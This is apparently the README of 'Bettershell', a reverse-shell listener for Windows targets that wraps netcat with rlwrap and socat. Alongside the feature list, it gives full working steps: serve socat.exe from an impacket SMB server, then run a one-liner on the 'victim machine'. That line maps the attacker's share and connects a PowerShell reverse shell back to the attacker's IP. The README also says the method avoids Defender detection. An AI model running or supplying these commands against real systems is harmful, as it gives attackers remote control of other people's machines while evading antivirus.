Bettershell is a basic netcat client, supercharged with rlwrap, socat, a large Powershell command wordlist, and bash scripting.
- Shells won't die on CTRL+C
- Preset tab autocomplete based on a Windows command list
- Filesystem-learning tab autocomplete, thanks to rlwrap's smart output parser
- Working arrowkey movement
- Searchable command history with CTRL+R
- An accurate path prompt
- No double echo of commands
- It's blue! Is it really powershell if it isn't blue?
Although bettershell can be used to catch any reverse shell from a Windows box, the included 'socat.exe' binary is strongly recommended to properly pipe stderr messages to your listener; visible error messages are invaluable when privilege-escalating.
Open port 445, then start up an impacket SMB server on your attack box in the same directory as socat.exe:
sudo smbserver.py SMB . -comment SMB -ts -debug -smb2support -username user -password pass
Start a listener in another window: ./bettershell -nlvp yourPORT
Lastly, execute the following on the victim machine:
cmd.exe /c net use x: \\yourIP\SMB /user:user pass & x:\socat.exe tcp-connect:yourIP:yourPORT exec:powershell.exe,pty,stderr
The above example shouldn't trigger Defender. Exclude authentication when attacking older PCs that don't support it, and substitute cmd.exe for powershell.exe since old powershell can be finicky.